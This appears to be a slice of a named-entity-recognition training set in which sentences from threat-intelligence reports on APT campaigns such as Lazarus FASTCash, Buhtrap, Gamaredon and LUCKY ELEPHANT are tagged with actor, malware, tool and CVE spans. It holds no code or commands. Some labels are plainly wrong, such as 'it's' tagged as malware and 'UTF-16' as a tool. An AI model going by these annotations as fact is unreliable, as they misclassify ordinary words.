{"text": "If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 .", "spans": {"MALWARE: it's": [[3, 7]], "TOOL: Cyrillic": [[8, 16]], "TOOL: UTF-16": [[136, 142]]}, "info": {"id": "dnrti_train_002484", "source": "dnrti_train"}}
{"text": "Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": {"MALWARE: Bisonal": [[15, 22]]}, "info": {"id": "dnrti_train_002485", "source": "dnrti_train"}}
{"text": "The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard .", "spans": {"MALWARE: the decoy PDF": [[16, 29]]}, "info": {"id": "dnrti_train_002486", "source": "dnrti_train"}}
{"text": "The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization .", "spans": {"MALWARE: installed EXE file": [[4, 22]], "MALWARE: Bisonal variant": [[72, 87]]}, "info": {"id": "dnrti_train_002487", "source": "dnrti_train"}}
{"text": "The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file .", "spans": {"TOOL: dropper": [[245, 252]]}, "info": {"id": "dnrti_train_002488", "source": "dnrti_train"}}
{"text": "A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild .", "spans": {"ORGANIZATION: Talos": [[55, 60]]}, "info": {"id": "dnrti_train_002489", "source": "dnrti_train"}}
{"text": "ined in the archive is called DriverInstallerU.exe” but its metadata shows that its original name is Interenet Assistant.exe” .", "spans": {"MALWARE: DriverInstallerU.exe”": [[30, 51]], "MALWARE: Interenet Assistant.exe”": [[101, 125]]}, "info": {"id": "dnrti_train_002490", "source": "dnrti_train"}}
{"text": "After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": {"THREAT_ACTOR: attackers": [[86, 95]], "ORGANIZATION: victims who answer": [[105, 123]]}, "info": {"id": "dnrti_train_002491", "source": "dnrti_train"}}
{"text": "In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” .", "spans": {"MALWARE: BMW_x1”": [[114, 121]], "MALWARE: BMW_x2”": [[124, 131]], "MALWARE: BMW_x8”": [[142, 149]]}, "info": {"id": "dnrti_train_002492", "source": "dnrti_train"}}
{"text": "But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]]}, "info": {"id": "dnrti_train_002493", "source": "dnrti_train"}}
{"text": "With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later .", "spans": {}, "info": {"id": "dnrti_train_002494", "source": "dnrti_train"}}
{"text": "These unknown actors continued launching DDoS attacks over the next few years .", "spans": {"THREAT_ACTOR: unknown actors": [[6, 20]]}, "info": {"id": "dnrti_train_002495", "source": "dnrti_train"}}
{"text": "For simplicity , Kaspersky is calling them the BlackEnergy APT group .", "spans": {"ORGANIZATION: Kaspersky": [[17, 26]]}, "info": {"id": "dnrti_train_002496", "source": "dnrti_train"}}
{"text": "Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document .", "spans": {"THREAT_ACTOR: BlackEnergy": [[67, 78]]}, "info": {"id": "dnrti_train_002497", "source": "dnrti_train"}}
{"text": "A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate .", "spans": {"ORGANIZATION: Cys Centrum": [[142, 153]]}, "info": {"id": "dnrti_train_002498", "source": "dnrti_train"}}
{"text": "The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 .", "spans": {"THREAT_ACTOR: BlackEnergy": [[48, 59]]}, "info": {"id": "dnrti_train_002499", "source": "dnrti_train"}}
{"text": "BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities .", "spans": {"THREAT_ACTOR: BlackEnergy": [[0, 11]]}, "info": {"id": "dnrti_train_002500", "source": "dnrti_train"}}
{"text": "Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackEnergy": [[39, 50]]}, "info": {"id": "dnrti_train_002501", "source": "dnrti_train"}}
{"text": "From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia .", "spans": {"THREAT_ACTOR: Buhtrap": [[5, 12]]}, "info": {"id": "dnrti_train_002502", "source": "dnrti_train"}}
{"text": "Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign .", "spans": {"ORGANIZATION: we've": [[26, 31]], "THREAT_ACTOR: this group": [[37, 47]], "THREAT_ACTOR: Buhtrap": [[166, 173]]}, "info": {"id": "dnrti_train_002503", "source": "dnrti_train"}}
{"text": "In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims .", "spans": {"THREAT_ACTOR: Buhtrap": [[27, 34]], "VULNERABILITY: CVE-2019-1132": [[80, 93]]}, "info": {"id": "dnrti_train_002504", "source": "dnrti_train"}}
{"text": "However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions .", "spans": {"THREAT_ACTOR: Buhtrap": [[142, 149]]}, "info": {"id": "dnrti_train_002505", "source": "dnrti_train"}}
{"text": "When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices .", "spans": {"THREAT_ACTOR: Buhtrap": [[5, 12]]}, "info": {"id": "dnrti_train_002506", "source": "dnrti_train"}}
{"text": "The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia .", "spans": {"THREAT_ACTOR: Buhtrap": [[4, 11]]}, "info": {"id": "dnrti_train_002507", "source": "dnrti_train"}}
{"text": "Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 .", "spans": {"THREAT_ACTOR: group": [[55, 60]]}, "info": {"id": "dnrti_train_002508", "source": "dnrti_train"}}
{"text": "When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions .", "spans": {"THREAT_ACTOR: group's": [[9, 16]], "ORGANIZATION: FinCERT": [[124, 131]]}, "info": {"id": "dnrti_train_002509", "source": "dnrti_train"}}
{"text": "We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region .", "spans": {"THREAT_ACTOR: DarkHydrus": [[28, 38]]}, "info": {"id": "dnrti_train_002510", "source": "dnrti_train"}}
{"text": "In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East .", "spans": {"ORGANIZATION: Palo Alto": [[15, 24]], "THREAT_ACTOR: DarkHydrus": [[35, 45]]}, "info": {"id": "dnrti_train_002511", "source": "dnrti_train"}}
{"text": "Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus .", "spans": {"VULNERABILITY: CVE-2018-8414": [[74, 87]], "THREAT_ACTOR: DarkHydrus": [[177, 187]]}, "info": {"id": "dnrti_train_002512", "source": "dnrti_train"}}
{"text": "However , the final payload is something that welivesecurity have never seen associated with Buhtrap .", "spans": {"ORGANIZATION: welivesecurity": [[46, 60]], "THREAT_ACTOR: Buhtrap": [[93, 100]]}, "info": {"id": "dnrti_train_002513", "source": "dnrti_train"}}
{"text": "It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user .", "spans": {"THREAT_ACTOR: 'darkhydrus'": [[26, 38]], "THREAT_ACTOR: ‘Williams’": [[58, 68]], "ORGANIZATION: Twitter user": [[105, 117]]}, "info": {"id": "dnrti_train_002514", "source": "dnrti_train"}}
{"text": "In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction .", "spans": {"THREAT_ACTOR: Dark Hydruns": [[26, 38]], "TOOL: Office VBA macro": [[53, 69]]}, "info": {"id": "dnrti_train_002515", "source": "dnrti_train"}}
{"text": "ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military .", "spans": {"ORGANIZATION: ASERT": [[0, 5]], "THREAT_ACTOR: LUCKY ELEPHANT": [[52, 66]]}, "info": {"id": "dnrti_train_002516", "source": "dnrti_train"}}
{"text": "From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[59, 73]], "ORGANIZATION: Microsoft Outlook": [[151, 168]]}, "info": {"id": "dnrti_train_002517", "source": "dnrti_train"}}
{"text": "ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials .", "spans": {"ORGANIZATION: ASERT": [[0, 5]]}, "info": {"id": "dnrti_train_002518", "source": "dnrti_train"}}
{"text": "It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward .", "spans": {"THREAT_ACTOR: group": [[86, 91]]}, "info": {"id": "dnrti_train_002519", "source": "dnrti_train"}}
{"text": "In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin .", "spans": {"THREAT_ACTOR: APT group": [[58, 67]]}, "info": {"id": "dnrti_train_002520", "source": "dnrti_train"}}
{"text": "Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign .", "spans": {"THREAT_ACTOR: Indian APT group": [[87, 103]]}, "info": {"id": "dnrti_train_002521", "source": "dnrti_train"}}
{"text": "The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group .", "spans": {"THREAT_ACTOR: APT group": [[109, 118]]}, "info": {"id": "dnrti_train_002522", "source": "dnrti_train"}}
{"text": "DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries .", "spans": {"THREAT_ACTOR: DoNot Team": [[0, 10]]}, "info": {"id": "dnrti_train_002523", "source": "dnrti_train"}}
{"text": "The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": {"ORGANIZATION: Pakistani businessmen": [[117, 138]]}, "info": {"id": "dnrti_train_002524", "source": "dnrti_train"}}
{"text": "DoNot Team’s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February .", "spans": {"THREAT_ACTOR: DoNot": [[0, 5]]}, "info": {"id": "dnrti_train_002525", "source": "dnrti_train"}}
{"text": "One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35) , a suspected Indian APT group .", "spans": {"THREAT_ACTOR: DoNot Team": [[70, 80]]}, "info": {"id": "dnrti_train_002526", "source": "dnrti_train"}}
{"text": "The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[18, 32]], "TOOL: doppelganger webpages": [[69, 90]]}, "info": {"id": "dnrti_train_002527", "source": "dnrti_train"}}
{"text": "The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 .", "spans": {}, "info": {"id": "dnrti_train_002528", "source": "dnrti_train"}}
{"text": "The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India .", "spans": {"THREAT_ACTOR: espionage": [[143, 152]]}, "info": {"id": "dnrti_train_002529", "source": "dnrti_train"}}
{"text": "However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia .", "spans": {"THREAT_ACTOR: Donot": [[30, 35]]}, "info": {"id": "dnrti_train_002530", "source": "dnrti_train"}}
{"text": "First attack of this campaign took place in May 2018 .", "spans": {}, "info": {"id": "dnrti_train_002531", "source": "dnrti_train"}}
{"text": "Arbor also published APT research on this group , and named it ‘Donot’ .", "spans": {"ORGANIZATION: Arbor": [[0, 5]], "THREAT_ACTOR: ‘Donot’": [[63, 70]]}, "info": {"id": "dnrti_train_002532", "source": "dnrti_train"}}
{"text": "Donot attacked government agencies , aiming for classified intelligence .", "spans": {"THREAT_ACTOR: Donot": [[0, 5]]}, "info": {"id": "dnrti_train_002533", "source": "dnrti_train"}}
{"text": "We identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage .", "spans": {"THREAT_ACTOR: ‘APT-C-35’": [[38, 48]]}, "info": {"id": "dnrti_train_002534", "source": "dnrti_train"}}
{"text": "At least 4 attack campaigns against Pakistan have been observed by us since 2017 .", "spans": {}, "info": {"id": "dnrti_train_002535", "source": "dnrti_train"}}
{"text": "Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims .", "spans": {"TOOL: Spear phishing": [[0, 14]]}, "info": {"id": "dnrti_train_002536", "source": "dnrti_train"}}
{"text": "In the latest attack , Donot group is targeting Pakistani businessman working in China .", "spans": {"THREAT_ACTOR: Donot group": [[23, 34]], "ORGANIZATION: Pakistani businessman": [[48, 69]]}, "info": {"id": "dnrti_train_002537", "source": "dnrti_train"}}
{"text": "Two unique malware frameworks , EHDevel and yty , are developed by attackers .", "spans": {"TOOL: EHDevel": [[32, 39]], "TOOL: yty": [[44, 47]], "THREAT_ACTOR: attackers": [[67, 76]]}, "info": {"id": "dnrti_train_002538", "source": "dnrti_train"}}
{"text": "Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones .", "spans": {"MALWARE: wuaupdt.exe": [[57, 68]]}, "info": {"id": "dnrti_train_002540", "source": "dnrti_train"}}
{"text": "From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China .", "spans": {"THREAT_ACTOR: Donot APT group": [[65, 80]]}, "info": {"id": "dnrti_train_002541", "source": "dnrti_train"}}
{"text": "Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]], "THREAT_ACTOR: NSIS installers": [[36, 51]]}, "info": {"id": "dnrti_train_002542", "source": "dnrti_train"}}
{"text": "They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) .", "spans": {}, "info": {"id": "dnrti_train_002543", "source": "dnrti_train"}}
{"text": "Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) .", "spans": {"THREAT_ACTOR: Earworm": [[0, 7]]}, "info": {"id": "dnrti_train_002544", "source": "dnrti_train"}}
{"text": "They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests .", "spans": {"THREAT_ACTOR: They": [[0, 4]]}, "info": {"id": "dnrti_train_002545", "source": "dnrti_train"}}
{"text": "SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later .", "spans": {"THREAT_ACTOR: SPLM": [[0, 4]], "THREAT_ACTOR: GAMEFISH": [[7, 15]], "THREAT_ACTOR: Zebrocy": [[22, 29]]}, "info": {"id": "dnrti_train_002546", "source": "dnrti_train"}}
{"text": "Our previous post on Sofacy's 2017 activity stepped away from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise .", "spans": {"THREAT_ACTOR: Sofacy's": [[21, 29]]}, "info": {"id": "dnrti_train_002547", "source": "dnrti_train"}}
{"text": "The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 .", "spans": {"THREAT_ACTOR: SPLM": [[20, 24]]}, "info": {"id": "dnrti_train_002548", "source": "dnrti_train"}}
{"text": "A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown .", "spans": {"THREAT_ACTOR: groups'": [[93, 100]], "ORGANIZATION: Chinese universities": [[113, 133]]}, "info": {"id": "dnrti_train_002549", "source": "dnrti_train"}}
{"text": "Either way , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion .", "spans": {"THREAT_ACTOR: group's": [[17, 24]]}, "info": {"id": "dnrti_train_002550", "source": "dnrti_train"}}
{"text": "The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[40, 54]], "TOOL: doppelganger webpages": [[59, 80]]}, "info": {"id": "dnrti_train_002551", "source": "dnrti_train"}}
{"text": "Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan .", "spans": {}, "info": {"id": "dnrti_train_002552", "source": "dnrti_train"}}
{"text": "Either way , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion .", "spans": {"THREAT_ACTOR: Sofacy's": [[13, 21]]}, "info": {"id": "dnrti_train_002553", "source": "dnrti_train"}}
{"text": "According to this new alert , Hidden Cobra the U.S government’s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 .", "spans": {"THREAT_ACTOR: Hidden Cobra": [[30, 42]]}, "info": {"id": "dnrti_train_002554", "source": "dnrti_train"}}
{"text": "Lazarus is a very active attack group involved in both cyber crime and espionage .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002555", "source": "dnrti_train"}}
{"text": "The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_002556", "source": "dnrti_train"}}
{"text": "Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks .", "spans": {"THREAT_ACTOR: Lazarus's": [[84, 93]]}, "info": {"id": "dnrti_train_002557", "source": "dnrti_train"}}
{"text": "More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware .", "spans": {"THREAT_ACTOR: Lazarus": [[16, 23]], "TOOL: WannaCry": [[165, 173]]}, "info": {"id": "dnrti_train_002558", "source": "dnrti_train"}}
{"text": "Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well .", "spans": {"MALWARE: nbtscan": [[61, 68]], "MALWARE: powercat": [[73, 81]]}, "info": {"id": "dnrti_train_002559", "source": "dnrti_train"}}
{"text": "To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions .", "spans": {"THREAT_ACTOR: Lazarus": [[37, 44]]}, "info": {"id": "dnrti_train_002560", "source": "dnrti_train"}}
{"text": "The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash .", "spans": {"THREAT_ACTOR: Lazarus": [[47, 54]]}, "info": {"id": "dnrti_train_002561", "source": "dnrti_train"}}
{"text": "In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions .", "spans": {"THREAT_ACTOR: Lazarus": [[60, 67]], "TOOL: (AIX)": [[118, 123]]}, "info": {"id": "dnrti_train_002562", "source": "dnrti_train"}}
{"text": "It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity .", "spans": {"THREAT_ACTOR: attackers": [[36, 45]], "TOOL: scripts": [[51, 58]]}, "info": {"id": "dnrti_train_002563", "source": "dnrti_train"}}
{"text": "In recent years , Lazarus has also become involved in financially motivated attacks .", "spans": {"THREAT_ACTOR: Lazarus": [[18, 25]]}, "info": {"id": "dnrti_train_002564", "source": "dnrti_train"}}
{"text": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs .", "spans": {"TOOL: malware": [[5, 12]], "THREAT_ACTOR: Lazarus": [[43, 50]]}, "info": {"id": "dnrti_train_002565", "source": "dnrti_train"}}
{"text": "Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002566", "source": "dnrti_train"}}
{"text": "Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002567", "source": "dnrti_train"}}
{"text": "WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet .", "spans": {"VULNERABILITY: CVE-2017-0144": [[100, 113]], "VULNERABILITY: CVE-2017-0145": [[118, 131]]}, "info": {"id": "dnrti_train_002568", "source": "dnrti_train"}}
{"text": "Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_002569", "source": "dnrti_train"}}
{"text": "In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured .", "spans": {"THREAT_ACTOR: Lazarus": [[11, 18]]}, "info": {"id": "dnrti_train_002570", "source": "dnrti_train"}}
{"text": "As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks .", "spans": {"ORGANIZATION: FASTCash": [[87, 95]], "THREAT_ACTOR: Lazarus": [[113, 120]]}, "info": {"id": "dnrti_train_002571", "source": "dnrti_train"}}
{"text": "The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer .", "spans": {"THREAT_ACTOR: attack": [[4, 10]], "TOOL: TeamViewer": [[105, 115]]}, "info": {"id": "dnrti_train_002572", "source": "dnrti_train"}}
{"text": "It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world .", "spans": {}, "info": {"id": "dnrti_train_002574", "source": "dnrti_train"}}
{"text": "The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user .", "spans": {"TOOL: archives": [[137, 145]], "THREAT_ACTOR: AutoHotKey": [[182, 192]], "TOOL: decoy image": [[213, 224]]}, "info": {"id": "dnrti_train_002575", "source": "dnrti_train"}}
{"text": "The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities .", "spans": {"THREAT_ACTOR: Lazarus group": [[126, 139]]}, "info": {"id": "dnrti_train_002576", "source": "dnrti_train"}}
{"text": "Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more .", "spans": {"THREAT_ACTOR: attacker's": [[196, 206]]}, "info": {"id": "dnrti_train_002577", "source": "dnrti_train"}}
{"text": "Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group .", "spans": {"MALWARE: implant": [[103, 110]], "THREAT_ACTOR: Gamaredon": [[115, 124]]}, "info": {"id": "dnrti_train_002578", "source": "dnrti_train"}}
{"text": "Gamaredon Group is an alleged Russian threat group .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]]}, "info": {"id": "dnrti_train_002579", "source": "dnrti_train"}}
{"text": "Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]]}, "info": {"id": "dnrti_train_002580", "source": "dnrti_train"}}
{"text": "EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user’s microphone and the ability to download and execute further modules .", "spans": {"THREAT_ACTOR: EvilGnome's": [[0, 11]], "TOOL: desktop screenshots": [[36, 55]], "TOOL: file stealing": [[58, 71]], "TOOL: capturing audio recording": [[83, 108]]}, "info": {"id": "dnrti_train_002581", "source": "dnrti_train"}}
{"text": "Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]], "TOOL: malware": [[92, 99]]}, "info": {"id": "dnrti_train_002582", "source": "dnrti_train"}}
{"text": "Gamaredon Group's implants are characterized by the employment of information stealing tools — among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task .", "spans": {"THREAT_ACTOR: Gamaredon Group's": [[0, 17]], "TOOL: information stealing tools": [[66, 92]]}, "info": {"id": "dnrti_train_002583", "source": "dnrti_train"}}
{"text": "Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]], "TOOL: malicious attachments": [[38, 59]]}, "info": {"id": "dnrti_train_002584", "source": "dnrti_train"}}
{"text": "The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s Windows tools .", "spans": {"THREAT_ACTOR: EvilGnome": [[39, 48]], "TOOL: SFX": [[70, 73]], "MALWARE: Windows tools": [[188, 201]]}, "info": {"id": "dnrti_train_002585", "source": "dnrti_train"}}
{"text": "We can observe that the sample is very recent , created on Thursday , July 4 .", "spans": {"MALWARE: sample": [[24, 30]]}, "info": {"id": "dnrti_train_002586", "source": "dnrti_train"}}
{"text": "As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking .", "spans": {"MALWARE: makeself script": [[51, 66]], "MALWARE: ./setup.sh": [[88, 98]]}, "info": {"id": "dnrti_train_002587", "source": "dnrti_train"}}
{"text": "The ShooterAudio module uses PulseAudio to capture audio from the user's microphone .", "spans": {"MALWARE: ShooterAudio module": [[4, 23]], "TOOL: PulseAudio": [[29, 39]]}, "info": {"id": "dnrti_train_002588", "source": "dnrti_train"}}
{"text": "makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory .", "spans": {"MALWARE: makeself.sh": [[0, 11]], "MALWARE: shell script": [[23, 35]]}, "info": {"id": "dnrti_train_002589", "source": "dnrti_train"}}
{"text": "During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target .", "spans": {"THREAT_ACTOR: group": [[35, 40]]}, "info": {"id": "dnrti_train_002590", "source": "dnrti_train"}}
{"text": "Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament .", "spans": {"THREAT_ACTOR: Gaza Cybergang Group3": [[0, 21]]}, "info": {"id": "dnrti_train_002591", "source": "dnrti_train"}}
{"text": "Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]]}, "info": {"id": "dnrti_train_002592", "source": "dnrti_train"}}
{"text": "The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": {"THREAT_ACTOR: SneakyPastes": [[28, 40]], "ORGANIZATION: embassies": [[45, 54]], "ORGANIZATION: activists": [[121, 130]], "ORGANIZATION: personnel": [[154, 163]]}, "info": {"id": "dnrti_train_002593", "source": "dnrti_train"}}
{"text": "Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": {"THREAT_ACTOR: Gaza Cybergang Group1": [[96, 117]], "ORGANIZATION: political personnel": [[142, 161]]}, "info": {"id": "dnrti_train_002594", "source": "dnrti_train"}}
{"text": "Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems .", "spans": {"THREAT_ACTOR: Gaza Cybergang Group1": [[0, 21]]}, "info": {"id": "dnrti_train_002595", "source": "dnrti_train"}}
{"text": "In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[19, 33]]}, "info": {"id": "dnrti_train_002596", "source": "dnrti_train"}}
{"text": "We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation .", "spans": {"THREAT_ACTOR: attacks": [[65, 72]]}, "info": {"id": "dnrti_train_002598", "source": "dnrti_train"}}
{"text": "Cylance determined that the ‘Ghost Dragon’ group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 .", "spans": {"ORGANIZATION: Cylance": [[0, 7]], "THREAT_ACTOR: ‘Ghost Dragon’": [[28, 42]], "TOOL: Gh0st RAT": [[92, 101]]}, "info": {"id": "dnrti_train_002599", "source": "dnrti_train"}}
